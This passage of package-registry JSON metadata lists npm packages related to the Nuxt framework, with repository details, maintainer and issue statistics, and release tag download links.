vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32596531,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T22:12:39.696Z","status":"online","status_checked_at":"2026-05-04T02:00:06.625Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:06.665Z","dependent_packages_count":0,"downloads":325,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":17.347614945716156,"dependent_repos_count":25.30552159382132,"dependent_packages_count":32.889739249478886,"stargazers_count":0.549889391249848,"forks_count":0.7675195807382026,"average":15.372056952200882},"purl":"pkg:npm/%40johnjenkins/nuxt","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@johnjenkins/nuxt","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@johnjenkins/nuxt","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@johnjenkins/nuxt/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-08T05:00:23.926Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786911.0872727273,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":589,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.4957762889600934,"merged_pull_requests_count":5385,"bot_issues_count":12,"bot_pull_requests_count":2971,"past_year_issues_count":838,"past_year_pull_requests_count":1377,"past_year_avg_time_to_close_issue":720221.4700665189,"past_year_avg_time_to_close_pull_request":229718.65300285988,"past_year_issues_closed_count":451,"past_year_pull_requests_closed_count":1049,"past_year_pull_request_authors_count":127,"past_year_issue_authors_count":605,"past_year_avg_comments_per_issue":2.2386634844868736,"past_year_avg_comments_per_pull_request":3.3209876543209877,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":551,"past_year_merged_pull_requests_count":932,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":59,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":42,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"cernymatej","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"BobbieGoede","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"antfu","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@johnjenkins%2Fnuxt/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@johnjenkins%2Fnuxt/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@johnjenkins%2Fnuxt/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@johnjenkins%2Fnuxt/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@johnjenkins%2Fnuxt/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@johnjenkins%2Fnuxt/codemeta","maintainers":[{"uuid":"johnny.jenkins","login":"johnny.jenkins","name":null,"email":"johnljenkins@hotmail.com","url":null,"packages_count":30,"html_url":"https://www.npmjs.com/~johnny.jenkins","role":null,"created_at":"2023-01-30T00:18:41.751Z","updated_at":"2023-01-30T00:18:41.751Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/johnny.jenkins/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096145,"name":"@nuxt/vue-renderer","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":67,"first_release_published_at":"2018-11-16T14:17:15.716Z","latest_release_published_at":"2024-06-28T11:35:01.230Z","latest_release_number":"2.18.1","last_synced_at":"2026-05-11T01:23:09.446Z","created_at":"2022-04-08T10:39:37.802Z","updated_at":"2026-05-11T01:23:09.446Z","registry_url":"https://www.npmjs.com/package/@nuxt/vue-renderer","install_command":"npm install @nuxt/vue-renderer","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"2x":"2.16.2","latest":"2.18.1"}},"repo_metadata":{"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2023-12-19T00:39:48.000Z","size":110320,"stargazers_count":49067,"open_issues_count":998,"forks_count":4604,"subscribers_count":782,"default_branch":"main","last_synced_at":"2023-12-19T08:47:20.125Z","etag":null,"topics":["csr","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-03-18T22:20:10.502Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":null,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":192434804,"owners_count":12699550,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G